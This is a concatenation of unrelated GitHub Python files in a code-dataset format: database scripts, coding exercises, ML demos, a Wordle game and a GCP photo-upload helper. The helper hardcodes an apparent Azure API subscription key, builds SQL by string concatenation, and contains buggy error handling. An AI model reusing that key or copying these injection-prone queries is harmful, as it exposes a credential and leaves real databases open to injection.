argparse import ArgumentParser\nimport datetime\nfrom dila2sql.models import db_proxy, Conteneur, Tetier, Sommaire\nfrom peewee import fn\n\ntoday = datetime.date.today()\n\n\ndef add_base_text_column(db):\n db.execute_sql(\"\"\"\n ALTER TABLE conteneurs\n ADD COLUMN IF NOT EXISTS texte_de_base TEXT;\n \"\"\")\n\n\ndef set_base_text_on_conteneurs(db):\n warnings = []\n conteneurs = Conteneur \\\n .select() \\\n .where(Conteneur.nature == 'IDCC') \\\n .where(Conteneur.active == True)\n for conteneur in tqdm(conteneurs):\n tetiers = Tetier \\\n .select() \\\n .where(Tetier.titre_tm == 'Texte de base') \\\n .where(Tetier.conteneur_id == conteneur.id)\n if tetiers.count() != 1:\n warnings.append(\n \"/!\\\\ %s tetiers 'Texte de base' found for conteneur %s\" %\n (len(tetiers), conteneur.id)\n )\n continue\n tetier_id = tetiers[0].id\n textes_de_base = Sommaire \\\n .select() \\\n .where(Sommaire.parent == tetier_id) \\\n .where(\n (\n (Sommaire.debut <= today) |\n (Sommaire.debut.is_null())) &\n (\n (Sommaire.fin >= today) |\n (Sommaire.fin.is_null()) |\n (fn.LEFT(Sommaire.etat, 7) == 
'VIGUEUR')\n )\n )\n if textes_de_base.count() == 0:\n warnings.append(\n \"/!\\\\ no textes de bases in sommaires for conteneur %s \"\n \"- tetier %s\" %\n (conteneur.id, tetier_id)\n )\n continue\n if textes_de_base.count() > 1:\n warnings.append(\n \"%s textes de bases in sommaires for conteneur %s - tetier %s\"\n \", using first\" %\n (textes_de_base.count(), conteneur.id, tetier_id)\n )\n texte_id = textes_de_base[0].element\n Conteneur.update(texte_de_base=texte_id) \\\n .where(Conteneur.id == conteneur.id) \\\n .execute()\n for warning in warnings:\n print(warning)\n\n\ndef run(db):\n add_base_text_column(db)\n set_base_text_on_conteneurs(db)\n\n\nif __name__ == '__main__':\n p = ArgumentParser()\n p.add_argument('db')\n args = p.parse_args()\n db = connect_db(args.db)\n db_proxy.initialize(db)\n run(db)\n","repo_name":"SocialGouv/dila2sql","sub_path":"packages/dila2sql/dila2sql/postprocess_scripts/kali/add_base_text_to_conteneurs.py","file_name":"add_base_text_to_conteneurs.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"fr","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"7240693515","text":"from .expr import Expr\nfrom lexer.num import Num\nfrom symbols.type import Type\nfrom lexer.word import Word\n\n\nclass Constant(Expr):\n def __init__(self, token=None, type_=None, i=None):\n if i:\n super().__init__(Num(i), Type.int_)\n else:\n super().__init__(token, type_)\n\nConstant.true = Constant(token=Word.true, type_=Type.bool_)\nConstant.false = Constant(token=Word.false, type_=Type.bool_)\n\n\ndef jumping(constant, t, f):\n if constant == Constant.true and t != 0:\n constant.emit('goto L{}'.format(t))\n elif constant == Constant.false and f != 0:\n constant.emit('goto L{}'.format(f))\n\nConstant.jumping = jumping\n","repo_name":"talespadua/Simple-Python-Compiler","sub_path":"inter/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21683951801","text":"'''mssg='hello'\r\nindex=0\r\nfor i in mssg:\r\n print(i)\r\n index+=1'''\r\n\r\n'''a='hello welcome to python'\r\ni=2\r\nprint(a[2:8:2]) '''\r\n\r\n'''a=str('hello')\r\nb=str('welcome to python')\r\nprint(a+','+b)\r\nprint(a+b)'''\r\n\r\n'''a='hello and welcome to python'\r\nprint(a.capitalize())\r\nb='el'\r\nprint(a.count(b,0,len(a)))\r\nprint(a.endswith('on',0,len(a)))'''\r\n\r\n'''a='BoNd007'\r\nb='007'\r\nc='abcd'\r\nprint(b.isalnum())\r\nprint(c.isalpha())\r\nprint(a.swapcase())\r\nprint(a.replace('B','b'))'''\r\n\r\n'''a='welcome to python'\r\nb='t'\r\nprint(a.startswith('t',0,len(a)))\r\nprint(a.endswith('t',0,len(a)))\r\nprint(a.count('t',0,len(a)))\r\nif b in a:\r\n print('found')\r\nelse:\r\n print('not found')'''\r\n\r\n#ASCII A-Z=65-90 and a-z=97-122 \r\n\r\n'''a='welcome to python'\r\nfor i in a:\r\n print(i,end=' ')'''\r\n\r\n'''a='welcome to python'\r\ni=0\r\nwhile i int:\n length = len(nums)\n if length < 2:\n return length\n i = 0\n j = 1\n while j < length:\n if nums[i] != nums[j]:\n i += 1\n nums[i] = nums[j]\n j += 1\n print(nums[:i + 1])\n return i + 1\n\n\ndef removeElement(nums, val) -> int:\n length = len(nums)\n i = 0\n j = length-1\n while i <= j:\n if nums[i] == val:\n temp = nums[j]\n nums[j] = nums[i]\n nums[i] = temp\n j -= 1\n else:\n i += 1\n return 
j+1","repo_name":"Akhilj786/CodingChallenge","sub_path":"LeetCode/src/RemoveDuplicate.py","file_name":"RemoveDuplicate.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39555297602","text":"import os\n\nfrom config import config\nfrom datasets.small_arc_dataset import SmallArcDirectGridDataset\nfrom prompting_classes.common import register_class\nfrom prompting_classes.zero_shot_prompt_convertor import ZeroShotPromptConvertor\n\n\n@register_class\nclass CoTPromptConvertor(ZeroShotPromptConvertor):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.dataset = SmallArcDirectGridDataset(config['dataset_location'])\n self.tasks = config.prompt_config.cot_tasks\n\n def get_task_as_cot_prompt(self, task_id):\n location = os.path.join(config.prompt_config.cot_prompt_location, f'{task_id}.txt')\n data, trains, tests = self.dataset.get_by_task_id(task_id)\n prompt_allged_input = ZeroShotPromptConvertor.convert_task_to_prompt(self, trains, tests)\n with open(location, 'r') as f:\n alleged_output = f.read()\n for idx in range(len(self.to_prompt_dict)):\n alleged_output = alleged_output.replace('{' + f'{str(idx)}' + '}', self.to_prompt_dict[idx])\n out_as_text = self.convert_mat_to_text(tests[0]['output'])\n alleged_output = alleged_output.replace('{out}', out_as_text)\n return prompt_allged_input + alleged_output\n\n def convert_task_to_prompt(self, train, test):\n cot_prompts = []\n for task in self.tasks:\n cot_prompts.append(self.get_task_as_cot_prompt(task))\n total_cot = ''\n for idx, prompt in enumerate(cot_prompts):\n total_cot += cot_prompts[idx] + '\\n'\n start_prompt = self.prompt_start # .format(len(self.train))\n training_prompt = \"\\n\"\n for idx, example in enumerate(train):\n inp = self.convert_mat_to_text(example['input'])\n out = self.convert_mat_to_text(example['output'])\n # training_prompt += numbers_to_letters[idx] + \".\\n\"\n training_prompt += f\"input {idx}:\\n{inp}\\noutput {idx}:\\n{out}\\n\\n\"\n test_prompt = self.prompt_test + '\\n'\n test_prompt += f\"input:\\n{self.convert_mat_to_text(test[0]['input'])}\"\n\n return total_cot + start_prompt + training_prompt + test_prompt + self.prompt_end\n","repo_name":"ethanbar11/arc","sub_path":"prompting_classes/cot_prompt_convertor.py","file_name":"cot_prompt_convertor.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17920730502","text":"import csv\nimport random\n\nwith open('words.txt') as file:\n reader = csv.reader(file)\n words = list(reader)\n \nwords = [item for sublist in words for item in sublist]\n\n# Pick random word as answer\nanswer = random.choice(words).lower() # Convert answer to lowercase for case-insensitive comparison\n\n# Game variables\nguesses = []\nmax_guesses = 6\n\n# Print header\nprint(\"{:<10} {:<}\".format(\"Guess #\", \"Guess\"))\nprint(\"{:-<21}\".format(\"\"))\n\n# Main game loop\nfor guess_num in range(max_guesses):\n\n # Get player's guess\n guess = input(\"{:<10} \".format(guess_num+1)).strip().lower() # Convert guess to lowercase and remove leading/trailing spaces\n\n # Validate guess\n if len(guess) != 6:\n print(\"Invalid guess - must be 6 letters!\")\n continue\n\n if not guess.isalpha():\n print(\"Invalid guess - letters only!\")\n continue\n\n # Check if already guessed\n if guess in guesses:\n print(\"You already guessed that word!\")\n continue\n\n # 
Add valid guess\n guesses.append(guess)\n\n # Print guess\n print(guess)\n\n # Check for winning guess\n if guess == answer:\n print(\"You got it! The word was\", answer)\n break\n \n # Give feedback on incorrect guess\n else:\n print(\"Correct position of guess:\")\n \n # Track correct letters and positions\n correct_letters = set()\n letter_positions = {}\n \n for i, letter in enumerate(guess):\n if letter == answer[i]:\n letter_positions[i] = letter\n elif letter in answer:\n correct_letters.add(letter)\n \n # Print position matches \n for i in range(6):\n if i in letter_positions:\n print(f\"{letter_positions[i]} is in position {i+1}\")\n \n # Print correct letters\n if correct_letters:\n print(\"Incorrect Position of Letters:\", \", \".join(correct_letters)) \n \n print()\n \n# Game over message\nif len(guesses) == max_guesses:\n print(\"You ran out of guesses. The word was\", answer)\n","repo_name":"AashishH15/6-Letter-Wordle","sub_path":"Wordle.py","file_name":"Wordle.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17883148585","text":"from _pydevd_bundle import pydevd_thrift\nfrom _pydevd_bundle.pydevd_comm import PyDBDaemonThread\nfrom _pydevd_bundle.pydevd_comm import threading\nfrom _pydevd_bundle.pydevd_comm import time\nfrom _pydevd_bundle.pydevd_constants import ASYNC_EVAL_TIMEOUT_SEC\n\n\nclass ThriftAbstractGetValueAsyncThread(PyDBDaemonThread):\n \"\"\"\n Abstract class for a thread, which evaluates values for async variables\n \"\"\"\n def __init__(self, server, seq, var_objects, user_type_renderers=None):\n PyDBDaemonThread.__init__(self)\n self.server = server\n self.seq = seq\n self.var_objs = var_objects\n self.cancel_event = threading.Event()\n self.user_type_renderers = user_type_renderers\n\n def send_result(self, xml):\n raise NotImplementedError()\n\n def _on_run(self):\n start = time.time()\n values = []\n for (var_obj, name) in self.var_objs:\n current_time = time.time()\n if current_time - start > ASYNC_EVAL_TIMEOUT_SEC or self.cancel_event.is_set():\n break\n # pydev_console_thrift.DebugValue()\n values.append(pydevd_thrift.var_to_struct(var_obj, name, evaluate_full_value=True, user_type_renderers=self.user_type_renderers))\n self.send_result(values)\n\n\nclass ThriftGetValueAsyncThreadConsole(ThriftAbstractGetValueAsyncThread):\n \"\"\"\n A thread for evaluation async values, which returns result for Console\n Send result directly to Console's server\n \"\"\"\n def send_result(self, values):\n if self.server is not None:\n self.server.returnFullValue(self.seq, values)\n","repo_name":"JetBrains/intellij-community","sub_path":"python/helpers/pydev/_pydev_bundle/pydev_console_commands.py","file_name":"pydev_console_commands.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"41890701945","text":"import numpy as np\nimport scipy\n\nimport matplotlib.pyplot as plt\nimport bayespy.plot as myplt\n\nfrom bayespy.utils import misc\nfrom bayespy.utils import random\nfrom bayespy.nodes import Gaussian, Categorical, Mixture, Dirichlet\n\nfrom bayespy.inference.vmp.vmp import VB\nfrom bayespy.inference.vmp import transformations\n\nimport bayespy.plot as bpplt\n\nfrom bayespy.demos import pca\n\n\ndef run(N=100000, N_batch=50, seed=42, maxiter=100, plot=True):\n \"\"\"\n Run deterministic annealing demo for 1-D Gaussian mixture.\n \"\"\"\n\n if seed is not 
None:\n np.random.seed(seed)\n\n # Number of clusters in the model\n K = 20\n\n # Dimensionality of the data\n D = 5\n\n # Generate data\n K_true = 10\n spread = 5\n means = spread * np.random.randn(K_true, D)\n z = random.categorical(np.ones(K_true), size=N)\n data = np.empty((N,D))\n for n in range(N):\n data[n] = means[z[n]] + np.random.randn(D)\n\n #\n # Standard VB-EM algorithm\n #\n\n # Full model\n mu = Gaussian(np.zeros(D), np.identity(D),\n plates=(K,),\n name='means')\n alpha = Dirichlet(np.ones(K),\n name='class probabilities')\n Z = Categorical(alpha,\n plates=(N,),\n name='classes')\n Y = Mixture(Z, Gaussian, mu, np.identity(D),\n name='observations')\n\n # Break symmetry with random initialization of the means\n mu.initialize_from_random()\n\n # Put the data in\n Y.observe(data)\n\n # Run inference\n Q = VB(Y, Z, mu, alpha)\n Q.save(mu)\n Q.update(repeat=maxiter)\n if plot:\n bpplt.pyplot.plot(np.cumsum(Q.cputime), Q.L, 'k-')\n max_cputime = np.sum(Q.cputime[~np.isnan(Q.cputime)])\n\n\n #\n # Stochastic variational inference\n #\n\n # Construct smaller model (size of the mini-batch)\n mu = Gaussian(np.zeros(D), np.identity(D),\n plates=(K,),\n name='means')\n alpha = Dirichlet(np.ones(K),\n name='class probabilities')\n Z = Categorical(alpha,\n plates=(N_batch,),\n plates_multiplier=(N/N_batch,),\n name='classes')\n Y = Mixture(Z, Gaussian, mu, np.identity(D),\n name='observations')\n\n # Break symmetry with random initialization of the means\n mu.initialize_from_random()\n\n # Inference engine\n Q = VB(Y, Z, mu, alpha, autosave_filename=Q.autosave_filename)\n Q.load(mu)\n\n # Because using mini-batches, messages need to be multiplied appropriately\n print(\"Stochastic variational inference...\")\n Q.ignore_bound_checks = True\n\n maxiter *= int(N/N_batch)\n delay = 1\n forgetting_rate = 0.7\n for n in range(maxiter):\n\n # Observe a mini-batch\n subset = np.random.choice(N, N_batch)\n Y.observe(data[subset,:])\n\n # Learn intermediate variables\n Q.update(Z)\n\n # Set step length\n step = (n + delay) ** (-forgetting_rate)\n\n # Stochastic gradient for the global variables\n Q.gradient_step(mu, alpha, scale=step)\n\n if np.sum(Q.cputime[:n]) > max_cputime:\n break\n \n if plot:\n bpplt.pyplot.plot(np.cumsum(Q.cputime), Q.L, 'r:')\n\n bpplt.pyplot.xlabel('CPU time (in seconds)')\n bpplt.pyplot.ylabel('VB lower bound')\n bpplt.pyplot.legend(['VB-EM', 'Stochastic inference'], loc='lower right')\n bpplt.pyplot.title('VB for Gaussian mixture model')\n\n return\n\n\nif __name__ == '__main__':\n import sys, getopt, os\n try:\n opts, args = getopt.getopt(sys.argv[1:],\n \"\",\n [\"n=\",\n \"batch=\",\n \"seed=\",\n \"maxiter=\"])\n except getopt.GetoptError:\n print('python stochastic_inference.py ')\n print('--n= Number of data points')\n print('--batch= Mini-batch size')\n print('--maxiter= Maximum number of VB iterations')\n print('--seed= Seed (integer) for the random number generator')\n sys.exit(2)\n\n kwargs = {}\n for opt, arg in opts:\n if opt == \"--maxiter\":\n kwargs[\"maxiter\"] = int(arg)\n elif opt == \"--seed\":\n kwargs[\"seed\"] = int(arg)\n elif opt in (\"--n\",):\n kwargs[\"N\"] = int(arg)\n elif opt in (\"--batch\",):\n kwargs[\"N_batch\"] = int(arg)\n\n run(**kwargs)\n\n plt.show()\n\n","repo_name":"bayespy/bayespy","sub_path":"bayespy/demos/stochastic_inference.py","file_name":"stochastic_inference.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","stars":675,"dataset":"github-code","pt":"66"} 
+{"seq_id":"6288627195","text":"from keras.models import model_from_json\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nimport numpy as np\nwith open(\"test_content.bin\",\"rb\") as f:\n content=np.load(f)\nX_test=content.astype(np.float32)\nwith open(\"test_result.bin\",\"rb\") as f:\n result=np.load(f)\nY_test=np.expand_dims(result, axis=1).astype(np.float32)\nmodel = model_from_json(open('model1.json').read())\nmodel.load_weights(\"hehe1.h5\")\nhehe=model.predict(X_test)\nresult=[]\nfor item in hehe:\n if item<0.5:\n result.append(0)\n if item>0.5:\n result.append(1)\nfpr, tpr, thresholds = metrics.roc_curve(Y_test, hehe, pos_label=1)\nauc_value=metrics.auc(fpr, tpr)\nscore=model.evaluate(X_test,Y_test)\nplt.plot(fpr,tpr)\nplt.show()\n","repo_name":"Duum/biyesheji","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15924000064","text":"import os\nimport sqlalchemy\n# from sqlalchemy import create_engine\n# from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey\nimport psycopg2\nfrom flask.ext.sqlalchemy import SQLAlchemy #uses extention in this file\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel\nimport glob\nimport os, shutil, os.path\nfrom os import walk\nfrom os import listdir\nfrom os.path import isfile, join\nimport requests,random\nfrom requests.exceptions import HTTPError\n\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"PkeyGCP.json\"\nimport google.cloud.storage\n\ndef imageNameToVStrings(index):\n f = []\n\n for (dirpath, dirnames, filenames) in walk('pics/'):\n f.extend(filenames)\n break\n\n\n return (addCloud(f, index))\n\n\n\n\n\ndef addCloud(source_file_names, index):\n # Create a storage client.\n storage_client = google.cloud.storage.Client()\n bucket_name = 'userpictures1'\n bucket = storage_client.get_bucket(bucket_name)\n subscription_key = \"1ce10fd9a4b142f9b31c020ec61d2393\"\n assert subscription_key\n for source_file_name in source_file_names:\n blob = bucket.blob(os.path.basename(\"/pics/\" + source_file_name))\n # Upload the local file to Cloud Storage.\n blob.upload_from_filename(\"/pics/\" + source_file_name)\n url = (\"https://storage.googleapis.com/userpictures1/\" + source_file_name)\n vision_base_url = \"https://eastus.api.cognitive.microsoft.com/vision/v1.0/\"\n vision_analyze_url = vision_base_url + \"analyze\"\n doc = \"\"\n try:\n headers = {'Ocp-Apim-Subscription-Key': subscription_key }\n params = {'visualFeatures': 'Tags'}\n data = {'url': url}\n response = requests.post(vision_analyze_url, headers=headers, params=params, json=data)\n response.raise_for_status()\n analysis = response.json()\n for ele in analysis[\"tags\"]:\n intWeight = int(round(ele[\"confidence\"]*10))\n tag = ele[\"name\"]+ \" \"\n for i in range(intWeight):\n doc += tag\n if \"person\" in doc:\n con = None\n con = psycopg2.connect(\"host='localhost' dbname='hackillinois2018'\")\n cur = con.cursor()\n tempPrivate = \"\"\n cur.execute(\"SELECT * FROM users WHERE uid = \" + str(index))\n row = cur.fetchone()\n tempPrivate += row[10]\n tempPrivate += url + \" \"\n cur.execute(\"UPDATE users SET private=%s WHERE uid = \"+ str(index), (tempPrivate))\n con.commit()\n else:\n con = None\n con = psycopg2.connect(\"host='localhost' dbname='hackillinois2018'\")\n cur = con.cursor()\n tempPublic = \"\"\n cur.execute(\"SELECT * FROM users WHERE 
uid = \"+str(index))\n row = cur.fetchone()\n tempPublic += row[9]\n tempPublic += url + \" \"\n cur.execute(\"UPDATE users SET image=%s WHERE uid = \" + str(index), (tempPublic))\n con.commit()\n except:\n print(\"damn\")\n finally:\n if con:\n con.close()\n folder = 'pics/'\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n #elif os.path.isdir(file_path): shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n\n\ndef returnTopThree(index):\n con = None\n docs = []\n try:\n con = psycopg2.connect(\"host='localhost' dbname='hackillinois2018'\")\n cur = con.cursor()\n qur = \"SELECT * FROM users WHERE uid = \" + str(index)\n cur.execute(qur)\n row = cur.fetchone()\n tempOrientation = row[7]\n print(tempOrientation)\n qur = \"SELECT * FROM users\"\n cur.execute(qur)\n while(True):\n row = cur.fetchone()\n if (row == None):\n break\n if(row[6] == tempOrientation):\n docs.append(row[11])\n except :\n if con:\n con.rollback()\n\n return -1\n finally:\n if con:\n con.close()\n tfidf = TfidfVectorizer().fit_transform(docs)\n cosine_similarities = linear_kernel(tfidf[index-1:index], tfidf).flatten()\n matches = sorted(range(len(cosine_similarities)), key=lambda i:cosine_similarities[i])[::-1][1:4]\n return matches\n\nimageNameToVStrings(5)\n\n\n\n\n\n\n\n# def addAndUpdate(source_file_name, index):\n# url = addCloud(source_file_name)\n# subscription_key = \"1ce10fd9a4b142f9b31c020ec61d2393\"\n# assert subscription_key\n# vision_base_url = \"https://eastus.api.cognitive.microsoft.com/vision/v1.0/\"\n# vision_analyze_url = vision_base_url + \"analyze\"\n# doc = \"\"\n# try:\n# headers = {'Ocp-Apim-Subscription-Key': subscription_key }\n# params = {'visualFeatures': 'Tags'}\n# data = {'url': URL}\n# response = requests.post(vision_analyze_url, headers=headers, params=params, json=data)\n# response.raise_for_status()\n# analysis = response.json()\n# for ele in analysis[\"tags\"]:\n# intWeight = int(round(ele[\"confidence\"]*10))\n# tag = ele[\"name\"]+ \" \"\n# for i in range(intWeight):\n# doc += tag\n# if \"person\" in doc:\n# con = None\n# docs = []\n# con = psycopg2.connect(\"host='localhost' dbname='hackillinois2018'\")\n# cur = con.cursor()\n# tempPrivate = \"\"\n# cur.execute(\"SELECT * FROM users WHERE Id=%s\", (index))\n# row = cur.fetchone()\n# tempPrivate += row[10]\n# tempPrivate += url + \" \"\n# cur.execute(\"UPDATE users SET private=%s WHERE Id=%s\", (tempPrivate, index))\n# con.commit()\n# else:\n# con = None\n# docs = []\n# con = psycopg2.connect(\"host='localhost' dbname='hackillinois2018'\")\n# cur = con.cursor()\n# tempPublic = \"\"\n# cur.execute(\"SELECT * FROM users WHERE Id=%s\", (index))\n# row = cur.fetchone()\n# tempPublic += row[9]\n# tempPublic += url + \" \"\n# cur.execute(\"UPDATE users SET image=%s WHERE Id=%s\", (tempPublic, index))\n# con.commit()\n# except:\n# print(\"damn\")\n# finally:\n# if con:\n# con.close()\n\n\n\n\n\n\n#def createUserTags():\n\n\n#INSERT INTO users(firstname, lastname, email, birthday, sex, orientation, location, address, pwdhash, image, private, tags, matched, flag, priv)\n","repo_name":"augustgress/hackillinois2018","sub_path":"WebGUI/GCPfunctions.py","file_name":"GCPfunctions.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43195984095","text":"import time\nimport matplotlib\nimport numpy as np\nfrom matplotlib import pyplot as 
plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom Sensor_Data_absorber import Get_Sensor_values_degital\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg,FigureCanvasAgg\nimport PySimpleGUI as sg\n\n\n\ndef colorblind(size,color):\n if 6 <= size <= 7:\n c = color\n elif 5 <= size < 6:\n c = 'darkgreen'\n elif 4 <= size < 5:\n c = 'olive'\n elif 3 <= size < 4:\n c = 'gold'\n elif 2 <= size < 3:\n c = 'orange'\n elif 1 <= size < 2:\n c = 'orangered'\n elif 0 <= size < 1:\n c = 'tomato'\n elif size < 0:\n c = 'red'\n else:\n c = color\n return (c)\n\n\ndef draw_figure(canvas, figure, loc=(0, 0)):\n figure_canvas_agg = FigureCanvasTkAgg(figure, canvas)\n figure_canvas_agg.draw()\n figure_canvas_agg.get_tk_widget().pack(side='top', fill='both', expand=1)\n return figure_canvas_agg\n\ndef figure_draw_1(fig2,ax2,mean,fig_agg2,j,xax):\n ax2.cla()\n ax2.grid()\n ax2.plot(xax, mean, color='blue', label=\"average\")\n ax2.set_xlabel(\"time\")\n ax2.set_ylabel(\"sensor average\")\n ax2.set_xlim(left=max(0, j - 50), right=j + 50)\n ax2.set_ylim(ymin=0, ymax=300)\n ax2.legend(loc=\"upper left\")\n return (fig_agg2)\n\n\ndef square_maker(ax,fig_agg,center,size,color):\n rep,i,rep1,rep2,rep3,k,rep4,j=[],0,[0,0,0],[],[],0,[0,0,0],0\n while i < len(center) :\n rep.append(np.linspace(center[i] - size[i] / 2, center[i] + size[i] / 2, num=10))\n i+=1\n rep1[0], rep4[0] = np.meshgrid(rep[1], rep[2])\n rep1[1], rep4[1] = np.meshgrid(rep[0], rep[2])\n rep1[2], rep4[2] = np.meshgrid(rep[0], rep[1])\n while k < len(rep1):\n rep2.append(np.ones_like(rep1[k]) * (center[k] - size[k] / 2))\n rep3.append(np.ones_like(rep1[k]) * (center[k] + size[k] / 2))\n k+=1\n p = colorblind(size[0],color)\n ax.plot_wireframe(rep3[0], rep1[0], rep4[0], color=p, rstride=1, cstride=1, alpha=0.6)\n ax.plot_wireframe( rep1[1], rep2[1], rep4[1], color='gray', rstride=1, cstride=1, alpha=0.6)\n ax.plot_wireframe( rep1[1], rep3[1], rep4[1], color='gray', rstride=1, cstride=1, alpha=0.6)\n return (ax, fig_agg)\n\n\n\n\ndef make_cube_ulti_new_oof(ax,data, fig_agg):\n ses = 7\n list1 = [[(((7 - (data[4])) / 2) - (14 - ses)), 0, 0],\n [(((7 - (data[0])) / 2) - (14 - ses)), 7.5, 0],\n [(((7 - (data[5])) / 2) - (14 - ses)), 0, 7.5],\n [(((7 - (data[1])) / 2) - (14 - ses)), 7.5, 7.5],\n [(((7 - data[6]) / 2) - (14 - ses)), 0, 15],\n [(((7 - data[2]) / 2) - (14 - ses)), 7.5, 15],\n [(((7 - (data[7])) / 2) - (14 - ses)), 0, 22.5],\n [(((7 - (data[3])) / 2) - (14 - ses)), 7.5, 22.5]]\n list2 = [(7 - ((data[4])), 7.5, 7.5), (7 - (data[0]), 7.5, 7.5),\n (7 - (data[5]), 7.5, 7.5),(7 - (data[1]), 7.5, 7.5),\n (7 - (data[6]), 7.5, 7.5),(7 - (data[6]), 7.5, 7.5),\n (7 - (data[7]), 7.5, 7.5), (7 - (data[3]), 7.5, 7.5)]\n list3 = ['b', 'b', 'g', 'g', 'g', 'g', 'b', 'b']\n i = 0\n ax.cla()\n\n while i< len(list3):\n ax, fig_agg = square_maker(ax,fig_agg,list1[i],list2[i],list3[i])\n i+= 1\n ax.set_xlim(-15, 15)\n ax.set_zlim(000, 18)\n return(fig_agg)\n\n\n\n\n\ndef Liniar_display(PORT):\n layout = [[sg.Canvas(key='-CANVAS-2')]]\n gui = sg.Window(title=\"Live Feed figure\", layout=layout, size=(1500, 900), finalize=True,\n resizable=True, element_justification='c')\n gui.Maximize()\n canvas_elem2 = gui['-CANVAS-2']\n canvas2 = canvas_elem2.TKCanvas\n fig2, ax2 = plt.subplots(1, 1)\n fig2.set_size_inches(15, 6)\n ax2.grid()\n fig_agg2 = draw_figure(canvas2, fig2)\n mean, xax, j = [], [], 0\n while True:\n (event, values) = gui.read(timeout=0)\n mean.append(Get_Sensor_values_degital(PORT))\n j = j + 1\n xax.append(j)\n fig_agg2 = 
figure_draw_1(fig2, ax2, mean, fig_agg2, j, xax)\n fig_agg2.draw()\n if event == sg.WIN_CLOSED:\n gui.close()\n break\n sys.exit()\n return ()\n\n\ndef three_D_display(PORT):\n data1 = [0, 0, 0, 0, 0, 0, 0, 0]\n data = [0, 0, 0, 0, 0, 0, 0, 0]\n layout = [[sg.Canvas(key='-CANVAS-')]]\n gui = sg.Window(title=\"Live Feed figure\", layout=layout, size=(800, 1000), finalize=True,\n resizable=True, element_justification='c')\n gui.Maximize()\n canvas_elem = gui['-CANVAS-']\n canvas = canvas_elem.TKCanvas\n fig = plt.figure()\n fig.set_size_inches(8, 8)\n ax = fig.add_subplot(projection='3d')\n fig_agg = draw_figure(canvas, fig)\n while True:\n (event, values) = gui.read(timeout=0)\n puredata = Get_Sensor_values_degital(PORT)\n for i in range(0, len(puredata)):\n data[i] = puredata[i] * 7 / 250\n fig_agg = make_cube_ulti_new_oof(ax, data, fig_agg,)\n fig_agg.draw()\n\n if event == sg.WIN_CLOSED:\n gui.close()\n break\n sys.exit()\n\n return ()\n\n","repo_name":"NizarMhatli/Touchence_sensor_python_gui","sub_path":"Data_display_options.py","file_name":"Data_display_options.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22031303504","text":"'''\nFor a given model family and a dataset: (resnet1d_3342, cifar100)\nThis script evaluates the manifold distance between each test image and the training set.\n'''\nfrom __future__ import print_function\n\nimport argparse\nimport os\nimport shutil\nimport time\nimport random\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport models.cifar as models\nimport faiss\n\nfrom utils import Bar, Logger, AverageMeter, accuracy, mkdir_p, savefig\nfrom scipy.spatial import KDTree\n\n# ['alexnet', 'bottleneck', 'conv_1_7x7', 'densenet', 'identity_block3', 'preresnet', 'resnet', 'resnext', 'vgg11',\n# 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn', 'vgg19', 'vgg19_bn', 'wrn']\nmodel_names = sorted(name for name in models.__dict__\n if name.islower() and not name.startswith(\"__\")\n and callable(models.__dict__[name]))\n\n# Use CUDA\nuse_cuda = torch.cuda.is_available()\n\n# Random seed\nmanualSeed = random.randint(1, 10000)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\nif use_cuda:\n torch.cuda.manual_seed_all(manualSeed)\n\n\ndef main():\n dataset = 'cifar100'\n arch = 'resnet50'\n model_type = 'resnet50_shuffle_bad_1142'\n layer = 11\n\n workers = 4\n test_batch = 100\n\n print('==> Preparing dataset %s' % dataset)\n tfms = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n if dataset == 'cifar10':\n dataloader = datasets.CIFAR10\n num_classes = 10\n elif dataset == 'cifar100':\n dataloader = datasets.CIFAR100\n num_classes = 100\n elif dataset == 'svhn':\n dataloader = datasets.SVHN\n num_classes = 10\n else:\n raise Exception('Only support CIFAR and SVHN!!!')\n\n trainset = dataloader(root='/data/users/yuefan/fanyue/dconv/data', train=True, download=True,\n transform=tfms)\n trainloader = data.DataLoader(trainset, batch_size=test_batch, shuffle=True, num_workers=workers)\n testset = dataloader(root='/data/users/yuefan/fanyue/dconv/data', train=False, download=True,\n transform=tfms)\n testloader = data.DataLoader(testset, batch_size=test_batch, 
